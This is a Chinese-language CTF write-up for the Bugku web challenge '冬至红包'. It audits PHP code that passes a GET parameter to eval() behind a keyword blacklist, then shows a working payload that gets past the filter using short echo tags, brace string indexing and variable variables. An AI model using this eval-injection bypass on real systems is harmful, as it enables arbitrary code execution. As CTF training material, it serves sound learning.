Bugku-web（冬至红包）

Bugku-web（冬至红包）

写个 wp
这里是一个代码审计，首先用注释进行解释：

<?php
    error_reporting(0);
    require __DIR__.'/flag.php';

    $exam = 'return\''.sha1(time()).'\';';//exam变量由对时间的sha加密构成

    if (!isset($_GET['flag'])) {
        echo '<a href="./?flag='.$exam.'">Click here</a>';
    }//检测是否存在get请求的flag值，如果没有就出来一个click here
    else if (strlen($_GET['flag']) != strlen($exam)) {
        echo '长度不允许';
    }//你给出的flag长度必须与默认给出的长度一致，否则一直报错
    else if (preg_match('/`|"|\.|\\\\|\(|\)|\[|\]|_|flag|echo|print|require|include|die|exit/is', $_GET['flag'])) {
        echo '关键字不允许';
    }//给出的flag的关键字过滤并进行阻拦
    else if (eval($_GET['flag']) === sha1($flag)) {
        echo $flag;//传入的flag值强制性等于flag的sha加密值，eval可以进行转义
    }
    else {
        echo '马老师发生甚么事了';
    }//其他情况显示该语句

    echo '<hr>';

    highlight_file(__FILE__);

看的出，我们的绕过必须是规定长度，同时不能包含打印之类的东西，flag，echo等等，但是由于eval的存在，我们可以使用代码转义，也就是任意代码执行。
首先为了能够echo，你需要知道：
<?=$aaaaa?>等价于 <?php echo $aaaaa; ?>
?>后面的字符串会打印出来，但不会转义。即php结束后会打印出你后面加上的字符串
举个例子：

<?php
   
   $a='flag';
   
   echo $a
   
   ?>123456<?=$a?>

它的执行结果为：

flag123456flag

相信你已经懂了。

然后为了能够拼凑出flag，你需要知道：
对于字符串可以使用大括号{}对字符串进行修改
举个例子：

<?php
	$a='fla*';
	$a{3}='g';
	echo $a;
	?>

执行结果为

flag

相信你已经明白了。

最后由于你的payload是不能直接出现flag的，所以你要借助$a来访问，访问方法：

可变变量
如果一个变量的值正好是一个变量的名称，再加一个'$'可以访问到指向的那个变量。
可以理解为那个变量具有多义性，使用更多的一个'$'来访问第二个意义

payload参考：

?flag=$a='fla*';$a{3}='g';?>11111111111111111;<?=$$a;?>

注意你并没有通过sha加解密绕过，所以不用管那个sha啦。